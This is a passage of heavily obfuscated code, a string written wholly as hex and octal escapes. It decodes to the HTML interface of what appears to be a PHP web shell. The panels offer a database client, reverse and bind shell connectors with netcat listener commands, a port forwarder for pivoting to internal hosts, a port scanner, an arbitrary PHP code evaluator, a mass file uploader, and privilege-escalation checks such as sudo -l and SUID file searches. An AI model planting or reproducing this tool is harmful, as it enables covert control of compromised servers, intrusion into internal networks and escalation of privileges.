x76\x3e\xa\x20\x9\11\x3c\x64\151\x76\40\151\144\x3d\42\166\151\x65\167\x2d\144\141\164\x61\142\x61\163\x65\42\40\143\x6c\141\x73\x73\75\42\x76\151\x65\167\55\143\157\156\x74\x61\151\x6e\x65\162\x22\76\74\144\x69\166\x20\x63\x6c\141\163\x73\75\42\143\x6f\156\164\145\156\164\55\x68\145\141\x64\x65\162\x22\76\104\x61\164\x61\142\141\163\145\40\x43\x6c\x69\x65\x6e\x74\x20\50\115\x79\x53\x51\x4c\151\51\x3c\x2f\144\151\166\x3e\x3c\x64\151\x76\40\143\x6c\x61\x73\163\x3d\42\143\157\x6e\x74\x65\x6e\x74\55\141\x72\x65\141\x22\x3e\74\144\151\x76\40\x63\x6c\x61\x73\x73\x3d\42\x64\x62\55\146\157\162\155\x2d\147\x72\151\144\x22\x3e\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\75\42\x74\x65\x78\164\42\x20\151\x64\75\42\x64\x62\55\x68\x6f\x73\x74\x22\x20\160\x6c\141\x63\x65\x68\x6f\154\144\145\x72\x3d\x22\x48\157\163\164\x20\50\145\x2e\147\56\x2c\40\154\x6f\x63\141\x6c\x68\157\163\164\x29\x22\76\x3c\151\x6e\160\x75\164\x20\164\x79\x70\x65\75\x22\x74\145\170\164\x22\40\x69\144\75\42\144\142\55\165\x73\145\162\42\x20\x70\154\141\x63\x65\150\x6f\154\x64\x65\162\x3d\42\x55\x73\x65\x72\x6e\x61\x6d\145\x20\x28\145\x2e\147\x2e\54\40\x72\157\x6f\164\x29\x22\76\74\x69\156\160\x75\164\x20\164\x79\x70\145\75\42\x70\141\x73\163\167\x6f\162\x64\x22\40\151\144\75\42\144\x62\55\160\141\x73\163\42\x20\160\154\x61\x63\145\150\157\154\x64\x65\x72\x3d\42\120\141\163\163\167\157\162\x64\42\x3e\x3c\x69\156\x70\165\x74\x20\164\171\160\x65\75\x22\x74\x65\170\164\x22\x20\151\144\x3d\42\144\142\x2d\156\141\155\x65\42\40\x70\154\141\x63\145\150\x6f\x6c\x64\145\162\x3d\x22\104\x61\164\x61\x62\141\163\145\x20\x4e\141\155\x65\42\x3e\74\57\144\x69\166\x3e\74\x74\145\x78\x74\x61\x72\145\x61\x20\151\144\75\42\x64\x62\x2d\161\x75\x65\162\171\42\40\163\164\x79\x6c\x65\x3d\42\167\151\144\164\x68\x3a\61\60\x30\x25\x3b\40\150\x65\151\x67\150\164\x3a\40\61\65\60\x70\x78\x3b\x20\x72\145\163\x69\172\145\72\166\x65\162\164\x69\143\141\x6c\x3b\42\40\x70\x6c\141\x63\x65\150\x6f\x6c\x64\x65\162\75\42\123\x45\114\105\x43\124\x20\x2a\x20\x46\122\117\115\40\x75\x73\145\x72\x73\x3b\42\76\74\x2f\164\x65\x78\164\x61\x72\145\x61\x3e\x3c\142\165\x74\x74\157\156\x20\151\x64\75\x22\x72\165\156\x2d\144\x62\x2d\161\165\145\162\171\55\142\164\156\42\x20\x73\164\171\x6c\145\x3d\42\x6d\x61\x72\147\151\156\55\164\x6f\x70\x3a\61\x72\x65\x6d\73\x22\x3e\x45\170\x65\x63\165\164\145\40\121\165\145\x72\x79\74\x2f\x62\165\x74\x74\157\x6e\76\74\144\x69\166\40\151\144\75\42\144\142\55\162\145\x73\x75\x6c\x74\x73\x2d\143\x6f\x6e\164\x61\x69\156\x65\x72\x22\76\74\x2f\x64\151\x76\76\x3c\57\144\x69\166\76\74\57\x64\151\166\x3e\12\40\x9\11\74\x64\151\166\x20\x69\x64\x3d\x22\166\x69\x65\167\x2d\x63\x6f\x6e\156\145\x63\164\42\x20\143\x6c\141\163\163\x3d\42\166\151\145\167\55\x63\157\156\x74\141\151\x6e\145\x72\42\76\74\x64\151\166\x20\143\x6c\x61\163\x73\75\x22\x63\x6f\156\x74\x65\x6e\x74\x2d\x68\x65\141\x64\145\x72\42\x3e\x43\157\156\x6e\x65\x63\164\x3c\57\144\x69\x76\76\x3c\x64\151\166\x20\143\154\141\x73\x73\x3d\x22\x63\157\x6e\x74\x65\156\x74\x2d\141\x72\145\x61\x22\x3e\x3c\144\x69\166\40\x63\154\141\x73\x73\x3d\x22\x74\x61\142\163\42\x3e\x3c\x73\160\141\156\x20\143\154\141\x73\163\75\42\x74\141\x62\x2d\154\x69\156\x6b\x20\x61\x63\164\x69\x76\145\42\40\x64\x61\164\x61\55\164\141\x62\75\42\162\x65\166\x65\x72\163\145\55\x73\x68\x65\x6c\x6c\x22\x3e\122\145\x76\x65\162\x73\145\x20\123\x68\145\x6c\x6c\74\57\x73\160\141\156\x3e\x3c\x73\160\x61\156\x20\143\154\141\163\x73\75\42\x74\141\142\55\x6c\151\156\x6b\x22\x20\x64\x61\x74\141\x2d\x74\x61\x62\75\x22\x62\x69\156\x64\55\x73\150\x65\x6c\154\x22\76\102\x69\x6e\144\x20\x53\150\145\154\x6c\74\57\163\160\x61\156\x3e\x3c\57\x64\x69\166\76\74\x64\x69\x76\x20\x69\x64\x3d\x22\x74\x61\x62\55\162\x65\166\x65\162\x73\145\x2d\163\150\x65\x6c\154\42\x20\x63\x6c\141\163\x73\75\42\x74\x61\142\55\x63\x6f\156\164\145\x6e\164\40\141\x63\x74\151\x76\145\x22\x3e\74\150\63\40\163\164\171\x6c\x65\75\42\155\141\x72\x67\151\156\x2d\164\x6f\x70\x3a\60\73\42\x3e\x43\157\x6e\x6e\x65\143\164\x20\x42\x61\x63\153\40\50\x52\145\x76\145\x72\163\x65\x20\x53\150\145\154\154\x29\74\57\x68\63\76\x3c\x70\40\x73\164\171\x6c\145\x3d\x22\143\x6f\x6c\157\x72\x3a\x76\x61\x72\x28\x2d\x2d\x74\145\x78\164\x2d\x6d\x65\144\x29\73\x20\155\x61\x72\147\x69\156\x2d\142\x6f\x74\x74\x6f\x6d\x3a\40\x31\56\65\x72\145\x6d\73\x22\x3e\x54\150\145\40\163\145\x72\x76\145\162\x20\143\x6f\156\156\145\x63\x74\163\40\157\165\164\x20\164\157\40\x79\157\x75\162\40\154\x69\x73\164\x65\156\x65\162\56\x20\123\x74\141\x72\164\40\x77\x69\x74\x68\40\74\143\x6f\144\145\x20\x73\x74\x79\x6c\145\75\x22\142\x61\143\x6b\147\x72\157\165\156\x64\x3a\x20\x76\x61\162\x28\55\55\142\x67\x2d\154\x69\147\150\x74\x29\73\40\160\141\144\144\151\x6e\x67\72\x20\x33\x70\x78\40\66\x70\x78\73\x20\x62\157\x72\x64\145\162\55\x72\x61\x64\x69\165\163\x3a\40\x34\160\x78\73\x22\x3e\156\x63\x20\x2d\154\166\x6e\x70\x20\64\64\64\x34\74\57\143\157\x64\145\x3e\56\x3c\57\160\x3e\x3c\144\x69\x76\40\143\x6c\x61\x73\163\x3d\42\x74\x6f\x6f\154\55\x73\x65\x63\164\x69\x6f\156\x22\x3e\x3c\144\151\166\76\x3c\x69\x6e\160\x75\x74\x20\164\171\x70\145\x3d\42\164\145\x78\164\x22\40\x69\x64\75\42\162\x65\x76\55\x73\x68\x65\154\x6c\x2d\x69\x70\42\40\x70\154\141\x63\145\150\x6f\154\x64\145\x72\x3d\42\x59\157\165\x72\x20\111\x50\x20\x41\x64\144\162\x65\x73\x73\x22\x20\163\164\171\x6c\x65\75\x22\x66\x6c\x65\170\72\x31\x3b\42\76\x3c\151\x6e\160\165\164\40\x74\171\160\145\x3d\x22\164\x65\x78\x74\x22\40\151\144\75\42\162\x65\166\x2d\x73\150\145\154\x6c\x2d\160\157\162\x74\42\40\x70\154\141\143\x65\x68\157\154\144\x65\x72\x3d\x22\x59\x6f\x75\x72\40\120\x6f\x72\164\42\40\163\x74\171\154\145\x3d\42\x77\x69\x64\164\150\72\61\x35\60\x70\170\73\x20\155\141\162\x67\x69\156\72\40\60\x20\60\x72\145\155\73\x22\76\x3c\142\165\164\164\157\x6e\x20\x69\144\x3d\42\143\157\x6e\156\145\x63\x74\55\162\x65\x76\x2d\163\x68\145\154\154\x2d\x62\164\156\x22\76\103\x6f\156\x6e\145\x63\164\x3c\57\x62\x75\x74\164\x6f\156\x3e\74\57\144\x69\x76\76\74\x2f\144\x69\166\76\74\57\144\151\x76\76\x3c\x64\x69\x76\x20\x69\x64\x3d\42\x74\x61\x62\x2d\x62\151\156\x64\55\x73\150\x65\x6c\154\x22\x20\x63\154\141\163\163\x3d\42\164\141\x62\55\143\x6f\x6e\164\145\x6e\164\x22\76\74\x68\63\x20\163\x74\x79\154\x65\x3d\x22\x6d\141\x72\147\151\156\55\164\157\160\72\60\x3b\x22\x3e\114\x69\x73\164\x65\x6e\40\146\x6f\162\x20\x43\157\x6e\x6e\145\x63\164\151\x6f\x6e\40\50\102\x69\x6e\144\40\123\x68\x65\154\154\51\x3c\x2f\150\x33\x3e\74\160\40\163\x74\x79\x6c\x65\x3d\x22\x63\x6f\154\157\x72\x3a\166\x61\x72\50\55\55\x74\x65\x78\x74\x2d\x6d\x65\144\x29\x3b\40\155\x61\x72\x67\x69\x6e\x2d\x62\157\164\x74\157\x6d\x3a\40\61\56\x35\x72\x65\x6d\73\x22\x3e\x54\150\145\x20\x73\145\162\x76\x65\x72\x20\x6f\x70\145\156\x73\40\141\40\160\157\162\164\x20\146\x6f\162\40\x79\157\x75\40\x74\x6f\40\143\x6f\x6e\x6e\145\x63\164\40\x74\157\56\x20\x43\x6f\x6e\156\145\143\x74\40\x77\151\x74\x68\40\74\x63\x6f\x64\x65\40\163\164\x79\x6c\x65\75\x22\x62\141\143\153\147\x72\157\x75\x6e\x64\x3a\x20\166\141\x72\50\x2d\55\142\147\55\x6c\x69\x67\x68\x74\x29\73\x20\160\141\x64\x64\x69\156\x67\72\40\63\x70\x78\x20\66\160\170\x3b\x20\x62\157\162\x64\x65\x72\x2d\x72\141\x64\x69\x75\163\72\x20\64\160\x78\73\42\76\x6e\x63\40\x5b\163\x65\162\x76\x65\x72\137\x69\160\135\40\64\64\x34\x34\74\x2f\143\x6f\144\145\x3e\56\74\x2f\160\76\74\x64\x69\166\40\x63\x6c\141\163\163\75\x22\x74\157\157\154\x2d\163\145\143\164\x69\157\156\x22\76\74\144\x69\x76\x3e\74\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x22\x74\x65\170\164\x22\x20\151\x64\x3d\42\142\151\x6e\x64\55\x73\150\145\x6c\154\55\160\x6f\162\x74\x22\x20\160\x6c\x61\x63\145\150\157\x6c\144\145\x72\x3d\42\x50\x6f\162\x74\40\x74\x6f\40\x4c\151\x73\x74\145\x6e\40\117\x6e\x22\x20\163\164\171\154\145\75\42\x77\x69\144\x74\150\x3a\x32\60\60\x70\x78\73\x20\x6d\141\x72\x67\151\x6e\x2d\162\x69\x67\150\164\72\x20\x31\x72\145\x6d\x3b\x22\76\74\142\165\164\x74\x6f\156\40\151\x64\x3d\42\143\157\156\156\145\x63\x74\x2d\x62\x69\x6e\x64\x2d\x73\x68\145\154\x6c\x2d\x62\164\156\42\76\114\151\163\x74\x65\156\74\57\x62\x75\164\164\157\156\76\x3c\x2f\144\x69\x76\76\x3c\x2f\x64\x69\166\76\74\x2f\x64\151\166\76\74\x2f\x64\x69\x76\76\74\x2f\144\151\166\76\xa\x20\11\x9\74\144\151\166\x20\x69\144\75\x22\166\x69\x65\x77\55\160\x69\166\x6f\164\x22\x20\x63\x6c\141\x73\163\75\x22\x76\x69\x65\x77\x2d\143\157\156\164\141\151\156\x65\162\x22\76\74\144\x69\x76\x20\x63\154\x61\x73\163\x3d\x22\x63\157\x6e\164\145\x6e\x74\55\150\x65\141\144\x65\162\42\x3e\x50\151\x76\x6f\x74\x69\x6e\x67\74\x2f\x64\151\x76\76\x3c\144\151\x76\40\143\x6c\x61\163\x73\75\42\143\157\x6e\164\145\x6e\x74\55\x61\162\145\x61\x22\x3e\74\144\151\x76\x20\143\x6c\141\163\x73\x3d\x22\x74\x6f\157\x6c\55\163\x65\x63\x74\x69\x6f\156\x22\x3e\x3c\x68\x33\76\122\145\x6d\x6f\164\x65\40\x50\x6f\162\x74\40\106\x6f\162\x77\141\x72\x64\145\162\74\x2f\x68\63\x3e\74\x70\40\163\x74\x79\x6c\x65\75\x22\x63\157\154\157\x72\72\166\x61\x72\50\55\x2d\164\x65\170\x74\x2d\x6d\x65\144\x29\x3b\x20\x6d\x61\162\x67\151\156\55\x62\x6f\164\164\157\155\72\40\61\56\x35\162\145\155\73\x22\x3e\x46\x6f\162\x77\x61\x72\x64\40\x61\x20\x70\157\x72\164\40\157\x6e\40\164\150\x69\x73\x20\163\x65\x72\166\x65\162\40\164\157\40\x61\40\x74\x61\162\x67\x65\x74\x20\x68\x6f\163\164\40\141\156\144\x20\x70\x6f\162\164\x2e\40\124\x68\151\x73\40\151\163\40\165\163\145\146\x75\x6c\x20\x66\x6f\162\x20\141\143\143\145\163\163\151\156\147\40\151\156\x74\x65\x72\156\x61\x6c\x20\163\145\162\166\151\143\145\x73\x2e\x3c\142\x72\x3e\x45\170\141\x6d\x70\154\x65\72\x20\114\x69\x73\x74\x65\x6e\x20\157\x6e\x20\x70\157\162\x74\x20\74\163\164\x72\x6f\156\147\x3e\70\x30\x38\60\74\57\163\164\162\x6f\x6e\147\x3e\x20\x68\145\x72\x65\x2c\x20\141\156\144\40\146\x6f\162\x77\141\162\x64\40\x74\157\x20\151\x6e\x74\x65\162\156\x61\154\40\144\x61\x74\141\142\141\163\145\40\141\164\40\x3c\163\164\162\157\x6e\x67\76\61\60\x2e\60\x2e\60\x2e\65\x3a\x33\63\60\x36\74\57\x73\164\162\x6f\x6e\x67\x3e\x2e\74\57\x70\76\x3c\144\x69\x76\40\163\x74\x79\x6c\x65\75\x22\x64\x69\x73\160\x6c\141\171\72\40\147\162\151\144\73\x20\x67\162\151\144\55\x74\145\x6d\x70\154\141\x74\145\55\143\157\154\165\155\x6e\163\x3a\40\x72\145\x70\x65\141\x74\50\141\165\164\157\x2d\146\x69\164\54\x20\x6d\151\156\155\x61\x78\x28\x32\x30\60\x70\x78\x2c\x20\61\146\162\x29\x29\73\x20\x67\141\x70\72\x20\61\x72\x65\x6d\73\40\x61\154\151\x67\156\x2d\x69\164\x65\155\163\72\40\x65\x6e\x64\x3b\42\x3e\x3c\151\x6e\x70\x75\164\x20\x74\x79\160\x65\75\x22\164\x65\x78\164\42\40\151\144\75\x22\160\146\55\154\151\x73\x74\x65\156\x2d\x70\x6f\162\x74\x22\40\x70\x6c\x61\x63\145\x68\157\154\144\145\x72\75\x22\114\151\x73\x74\145\x6e\40\120\x6f\162\164\40\x28\x6f\156\x20\x74\x68\151\163\40\163\145\162\166\x65\162\51\x22\x3e\x3c\x69\x6e\x70\x75\164\x20\x74\171\x70\145\75\x22\164\x65\170\164\42\40\151\144\75\42\x70\x66\55\164\x61\x72\x67\x65\164\55\150\157\163\x74\42\x20\x70\x6c\141\143\145\x68\157\154\x64\x65\162\75\x22\124\x61\x72\x67\x65\x74\40\x48\x6f\x73\x74\40\x28\151\x6e\164\x65\162\156\141\154\40\111\120\x29\x22\x3e\x3c\151\156\x70\x75\164\x20\x74\171\160\145\x3d\42\164\145\170\x74\x22\40\151\x64\75\x22\160\146\55\x74\141\x72\x67\145\x74\55\160\157\x72\x74\x22\x20\160\154\x61\143\x65\x68\157\x6c\144\x65\x72\75\x22\124\141\x72\147\145\164\x20\120\157\x72\164\40\x28\x6f\156\40\151\156\x74\145\x72\x6e\141\154\x20\111\x50\x29\42\x3e\x3c\x62\x75\164\164\x6f\156\40\x69\x64\x3d\42\163\164\x61\162\164\55\x70\157\162\x74\x2d\146\x6f\162\x77\x61\162\144\x2d\x62\164\x6e\42\40\143\154\141\x73\163\75\42\x64\x61\x6e\x67\x65\162\55\x62\164\156\42\x3e\123\164\x61\x72\164\x20\106\157\162\x77\x61\x72\x64\x65\x72\x3c\x2f\x62\165\164\164\157\x6e\76\x3c\x2f\x64\151\166\76\x3c\x70\x20\x73\x74\171\x6c\145\x3d\x22\143\157\x6c\157\162\72\166\141\x72\50\55\55\x74\145\x78\x74\55\x6d\x65\144\x29\73\40\x66\157\156\x74\x2d\163\x69\x7a\145\72\x20\x30\56\x38\x72\x65\x6d\73\40\155\141\x72\x67\x69\x6e\55\x74\157\x70\x3a\40\61\x72\145\155\x3b\42\76\x3c\163\164\x72\157\x6e\147\76\116\157\164\x65\x3a\x3c\57\x73\x74\x72\157\156\147\x3e\40\x44\165\x65\x20\x74\x6f\40\x77\x65\142\40\x73\x65\162\x76\x65\x72\x20\154\x69\155\151\164\141\164\x69\157\x6e\163\x2c\40\164\x68\x69\163\40\146\x6f\x72\x77\141\162\144\145\162\40\x77\x69\154\154\x20\x6c\x69\153\145\154\171\x20\150\141\x6e\x64\x6c\x65\x20\141\40\163\151\156\x67\154\145\x20\143\154\151\x65\156\164\x20\143\157\x6e\156\x65\143\x74\151\x6f\156\40\141\156\x64\40\x74\150\145\156\40\x74\145\x72\155\x69\x6e\141\x74\x65\x2e\x20\x53\164\141\162\164\x20\151\x74\40\152\x75\163\x74\x20\142\x65\x66\x6f\x72\145\40\171\x6f\x75\x20\151\x6e\x74\x65\x6e\144\x20\x74\x6f\x20\x63\157\156\x6e\145\x63\164\40\164\x68\x72\157\165\x67\150\40\151\164\x2e\x3c\57\x70\76\x3c\57\x64\x69\166\x3e\74\57\144\151\166\76\x3c\x2f\x64\151\166\76\xa\40\x9\x9\74\x64\151\166\x20\x69\x64\x3d\42\x76\151\145\x77\55\x6e\x65\x74\x77\x6f\162\153\x22\40\x63\x6c\141\x73\x73\75\x22\166\x69\x65\167\55\143\x6f\156\164\x61\151\156\145\162\42\76\74\x64\x69\x76\40\x63\154\x61\163\x73\75\42\x63\157\x6e\164\x65\x6e\x74\x2d\x68\145\x61\x64\145\162\x22\x3e\x4e\145\x74\x77\x6f\162\x6b\40\x54\157\157\x6c\x73\x3c\57\144\x69\x76\x3e\74\144\151\166\x20\x63\x6c\x61\x73\x73\75\x22\x63\x6f\x6e\x74\145\156\x74\55\141\x72\x65\x61\40\164\x6f\157\x6c\55\x73\x65\143\164\x69\x6f\x6e\42\76\74\x68\63\x3e\120\x6f\162\164\x20\x53\x63\x61\156\156\145\162\x3c\x2f\150\63\x3e\74\x64\151\166\76\74\x69\156\x70\x75\x74\x20\164\171\x70\145\75\x22\164\145\x78\164\42\40\x69\x64\x3d\x22\x73\143\x61\156\55\150\157\163\164\x22\x20\x70\154\x61\x63\145\x68\157\154\x64\145\x72\x3d\x22\x48\x6f\163\x74\40\50\x65\x2e\x67\56\x2c\40\61\62\67\56\60\x2e\60\56\61\51\x22\x20\163\x74\171\x6c\x65\75\42\146\154\x65\x78\72\x31\73\x22\x3e\x3c\x69\x6e\x70\x75\164\x20\x74\171\160\x65\75\x22\x74\145\170\x74\42\x20\151\x64\75\42\163\x63\x61\156\55\160\157\x72\x74\163\x22\40\160\x6c\x61\143\x65\150\157\x6c\x64\145\162\x3d\42\120\x6f\x72\164\163\40\50\x65\x2e\x67\x2e\54\40\x32\62\x2c\70\60\x2c\x34\64\63\x29\42\x20\163\x74\x79\154\145\75\42\x66\x6c\145\170\72\61\73\x20\155\141\x72\x67\x69\156\72\x20\60\40\60\162\x65\x6d\x3b\x22\76\74\x62\165\x74\x74\157\x6e\40\x69\144\75\x22\x73\x74\x61\x72\164\x2d\163\143\x61\156\x2d\142\164\x6e\42\x3e\123\x63\x61\x6e\74\57\x62\x75\x74\164\x6f\156\x3e\74\x2f\x64\151\166\76\x3c\x70\162\x65\x20\151\x64\75\x22\x73\143\141\x6e\x2d\x72\x65\x73\x75\x6c\x74\163\42\x20\x63\154\x61\163\163\x3d\42\157\x75\164\x70\165\x74\x2d\x62\157\x78\x22\x3e\x3c\57\160\x72\x65\76\x3c\x2f\x64\151\166\76\x3c\x2f\144\151\166\x3e\12\40\11\x9\x3c\144\151\166\40\x69\x64\x3d\x22\166\x69\x65\x77\x2d\x65\x76\141\154\x22\40\143\x6c\141\163\x73\x3d\42\166\151\145\x77\55\143\157\x6e\164\141\151\156\145\162\42\x3e\74\144\x69\x76\x20\143\x6c\141\163\x73\x3d\42\143\157\156\164\145\x6e\x74\55\150\x65\141\x64\145\162\x22\x3e\120\110\120\x20\103\x6f\144\x65\40\105\166\141\x6c\x75\x61\x74\157\162\74\x2f\144\151\x76\76\x3c\x64\x69\x76\x20\143\x6c\x61\163\x73\75\42\143\x6f\x6e\x74\x65\x6e\164\x2d\141\162\145\141\42\40\x73\164\171\x6c\x65\75\42\144\151\x73\160\x6c\141\171\72\x20\x66\154\145\170\73\x20\146\x6c\x65\x78\55\144\x69\162\x65\143\164\x69\x6f\x6e\72\x20\143\157\154\165\x6d\156\73\42\x3e\74\164\145\x78\164\141\162\145\141\x20\x69\x64\75\42\145\x76\141\154\x2d\x63\157\x64\145\x22\x20\163\164\x79\x6c\x65\75\x22\146\154\145\x78\72\x31\73\40\167\151\144\164\x68\72\x31\60\x30\x25\x3b\x20\x72\145\163\x69\172\x65\x3a\166\145\x72\x74\x69\143\141\154\x3b\42\x20\x70\x6c\141\x63\145\150\157\x6c\144\x65\x72\x3d\x22\x65\x63\150\157\x20\47\x48\145\x6c\x6c\x6f\x2c\x20\x57\x6f\162\x6c\144\41\47\x3b\x22\x3e\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\x61\x3e\x3c\x62\x75\164\x74\x6f\x6e\40\x69\x64\75\42\x72\165\156\55\145\166\x61\154\x2d\142\x74\x6e\x22\40\x73\164\171\154\145\x3d\x22\x6d\141\162\x67\151\x6e\x2d\164\157\x70\x3a\61\162\145\155\x3b\40\x61\x6c\x69\x67\x6e\x2d\163\x65\x6c\146\x3a\x20\x66\154\145\170\55\x73\x74\141\x72\164\x3b\x22\x3e\x45\x78\145\x63\165\x74\x65\x3c\57\x62\x75\x74\164\x6f\x6e\x3e\74\x68\63\40\x73\x74\x79\154\x65\75\42\155\141\162\x67\x69\x6e\x2d\x74\157\x70\72\40\x32\162\x65\155\73\x22\76\117\165\x74\160\165\164\x3a\74\57\x68\x33\76\x3c\x70\162\145\40\151\x64\75\x22\x65\x76\x61\x6c\x2d\x6f\165\164\x70\x75\164\x22\40\143\154\141\163\163\75\x22\157\165\x74\160\165\164\55\142\x6f\x78\x22\x3e\x3c\x2f\x70\x72\x65\x3e\x3c\57\144\x69\166\76\x3c\x2f\144\151\166\x3e\12\x20\11\x9\x3c\x64\x69\x76\40\151\144\x3d\42\166\x69\x65\167\55\x6d\x61\x73\163\55\165\160\154\157\x61\x64\x65\162\42\40\x63\154\141\163\163\75\x22\x76\151\x65\167\x2d\x63\157\156\164\x61\151\156\145\162\42\76\x3c\x64\151\166\40\x63\x6c\x61\163\163\75\42\x63\x6f\156\x74\145\156\164\55\150\x65\x61\x64\x65\162\42\x3e\x4d\x61\163\x73\40\125\x70\154\x6f\141\x64\x65\x72\x3c\x2f\x64\x69\x76\76\x3c\144\x69\166\x20\x63\x6c\141\163\x73\x3d\42\x63\157\156\x74\x65\156\164\55\x61\x72\145\141\42\40\x73\x74\x79\x6c\x65\75\x22\144\x69\163\x70\x6c\x61\171\72\40\146\x6c\x65\x78\x3b\x20\x66\154\x65\x78\x2d\144\151\x72\145\x63\x74\x69\157\156\x3a\40\143\157\154\x75\x6d\x6e\x3b\x20\x67\141\x70\x3a\x20\x31\x2e\65\x72\145\x6d\73\x22\x3e\74\x64\x69\x76\x3e\x3c\150\63\x3e\x31\x2e\40\123\145\154\x65\x63\164\40\x46\x69\x6c\x65\x20\x74\x6f\40\x55\160\x6c\x6f\141\144\74\x2f\x68\x33\x3e\x3c\151\156\x70\165\x74\x20\x74\171\x70\145\x3d\x22\x66\151\x6c\145\42\40\151\x64\x3d\42\x6d\x61\163\x73\55\x75\160\154\x6f\141\x64\55\151\156\160\x75\164\42\x20\x73\x74\171\x6c\145\x3d\42\x62\x61\143\153\147\x72\x6f\x75\x6e\x64\x3a\40\166\x61\162\50\55\55\x62\x67\x2d\154\x69\x67\150\x74\51\x3b\x20\x70\141\x64\144\151\156\147\72\x20\61\60\160\170\73\40\x62\x6f\162\x64\145\x72\55\x72\141\144\151\x75\163\72\x20\66\x70\170\73\40\167\x69\x64\x74\150\72\x20\x31\60\x30\x25\x3b\x22\76\74\57\x64\151\166\76\x3c\x64\x69\166\40\x73\164\x79\x6c\x65\75\42\144\151\163\160\x6c\141\x79\72\40\x66\x6c\x65\x78\73\40\146\x6c\x65\x78\55\x64\151\162\145\143\164\x69\x6f\156\x3a\x20\143\157\x6c\165\155\156\x3b\40\146\154\x65\x78\72\x20\61\73\x20\155\151\156\x2d\150\145\x69\147\x68\x74\72\40\60\x3b\x22\x3e\74\x68\63\x3e\62\56\40\123\145\x6c\x65\x63\x74\40\x54\141\162\147\x65\x74\x20\104\x69\x72\x65\x63\x74\x6f\x72\x69\x65\x73\x3c\x2f\150\x33\76\74\144\151\x76\x20\x69\144\75\x22\144\x69\162\x2d\164\162\145\145\x2d\x63\x6f\x6e\164\141\x69\156\145\162\x22\40\163\164\171\154\x65\x3d\42\146\154\145\x78\72\x20\x31\73\x20\157\166\x65\162\146\154\x6f\x77\55\x79\72\x20\141\165\x74\157\73\x20\142\157\x72\144\x65\x72\72\40\61\x70\x78\40\x73\157\x6c\x69\144\x20\166\141\162\x28\x2d\55\x62\157\162\144\145\162\55\x63\x6f\154\x6f\x72\51\73\40\142\141\x63\x6b\x67\x72\x6f\165\156\x64\x3a\x20\x76\x61\162\x28\x2d\55\x62\x67\x2d\x64\x61\162\x6b\x29\x3b\40\160\141\x64\x64\x69\156\147\72\x20\61\162\145\155\x3b\x20\x62\157\x72\144\x65\162\55\162\141\x64\x69\x75\x73\72\40\x36\160\x78\x3b\42\76\x3c\x70\x3e\x4c\x6f\141\144\151\156\x67\40\x64\x69\x72\145\x63\x74\x6f\x72\171\40\x74\162\145\145\56\56\x2e\74\57\x70\76\x3c\x2f\144\151\x76\x3e\74\57\x64\151\x76\76\74\144\x69\166\76\x3c\x68\x33\76\x33\56\x20\105\x78\145\143\x75\164\x65\40\125\x70\154\x6f\x61\144\x3c\x2f\x68\x33\x3e\74\142\165\x74\164\157\156\x20\x69\x64\75\42\x6d\x61\x73\163\55\x75\160\x6c\157\141\144\x2d\x62\x74\x6e\42\76\x55\x70\154\157\x61\144\x20\164\x6f\40\123\x65\x6c\x65\143\x74\145\144\40\104\151\162\x65\x63\164\157\162\x69\145\163\74\57\142\x75\x74\x74\x6f\x6e\76\74\x2f\144\x69\x76\x3e\x3c\x2f\x64\151\166\76\74\x2f\144\x69\x76\76\xa\40\x9\x9\74\144\x69\x76\40\151\144\x3d\42\x76\x69\145\x77\x2d\x73\x65\143\x75\x72\x69\x74\171\42\40\x63\x6c\x61\x73\x73\x3d\42\x76\x69\145\167\55\x63\x6f\x6e\164\141\x69\x6e\x65\x72\x22\x3e\74\144\x69\x76\40\143\154\x61\163\163\x3d\42\x63\157\156\164\x65\156\x74\55\150\145\x61\144\x65\x72\42\x3e\x45\156\x75\x6d\x65\162\x61\x74\151\x6f\x6e\x20\x26\x20\x50\162\x69\166\151\154\x65\x67\x65\x20\105\x73\x63\x61\154\x61\x74\151\157\156\74\57\x64\x69\x76\x3e\74\x64\151\x76\40\143\154\x61\163\163\x3d\42\143\157\x6e\164\145\156\164\x2d\x61\162\x65\x61\42\x3e\x3c\x64\x69\x76\76\74\142\165\x74\164\x6f\156\40\151\144\75\x22\x67\x65\164\x2d\x75\163\145\x72\x2d\143\157\156\x74\145\170\x74\55\x62\x74\156\x22\x3e\x47\145\164\x20\x55\x73\145\x72\x20\103\157\156\164\145\x78\x74\40\x28\167\150\x6f\x61\x6d\x69\54\40\x69\144\51\74\x2f\x62\165\x74\x74\157\156\76\x3c\x62\165\164\x74\x6f\x6e\40\x69\x64\75\x22\163\x75\144\157\55\x63\x68\145\143\153\x2d\142\x74\x6e\x22\x20\x73\x74\171\x6c\145\x3d\x22\x6d\141\x72\147\x69\x6e\55\x6c\x65\146\x74\72\60\162\145\x6d\x3b\42\x3e\103\x68\145\143\153\x20\x53\165\144\157\x20\x2d\x6c\x3c\x2f\142\165\x74\164\x6f\156\76\x3c\57\x64\151\x76\x3e\x3c\x70\162\x65\40\151\144\x3d\42\x75\x73\x65\x72\55\143\x6f\x6e\164\145\x78\x74\x2d\157\165\x74\160\x75\164\42\x20\143\x6c\x61\163\x73\75\42\x6f\165\164\x70\x75\x74\55\x62\157\170\42\x20\163\x74\x79\154\x65\x3d\42\x64\x69\x73\x70\154\141\x79\72\x6e\x6f\156\145\73\42\x3e\74\57\160\162\145\76\74\160\x72\x65\40\x69\144\x3d\x22\x73\165\x64\157\55\143\x68\145\143\153\55\157\x75\x74\160\x75\x74\42\40\143\x6c\141\163\163\x3d\x22\157\165\164\x70\x75\x74\55\142\x6f\x78\42\40\163\164\171\154\145\75\42\x64\151\163\160\x6c\141\x79\x3a\x6e\x6f\156\145\x3b\x22\76\74\57\x70\162\x65\x3e\74\x68\162\76\x3c\x68\x33\76\x50\x72\x69\x76\x69\154\145\147\x65\x20\x45\x73\x63\x61\x6c\141\x74\x69\157\x6e\40\x53\143\x61\156\x6e\145\x72\x73\74\x2f\x68\x33\x3e\x3c\144\x69\166\x20\x63\154\x61\163\163\75\x22\x74\x6f\157\154\x2d\163\x65\x63\164\151\157\156\42\x3e\x3c\x64\151\166\76\x3c\x62\x75\164\x74\157\x6e\40\151\x64\75\42\x66\151\x6e\x64\55\x73\165\x69\x64\55\x67\165\151\x64\55\x62\164\x6e\x22\x3e\x46\x69\x6e\144\x20\x53\x55\111\x44\57\x47\125\x49\x44\40\x46\x69\x6c\x65\x73\x3c\57\142\165\x74\x74\157\156\x3e\74\160\x72\x65\40\151\144\75\42\163\x75\151\144\55\x67\x75\x69\x64\x2d\157\x75\164\160\x75\x74\42\40\14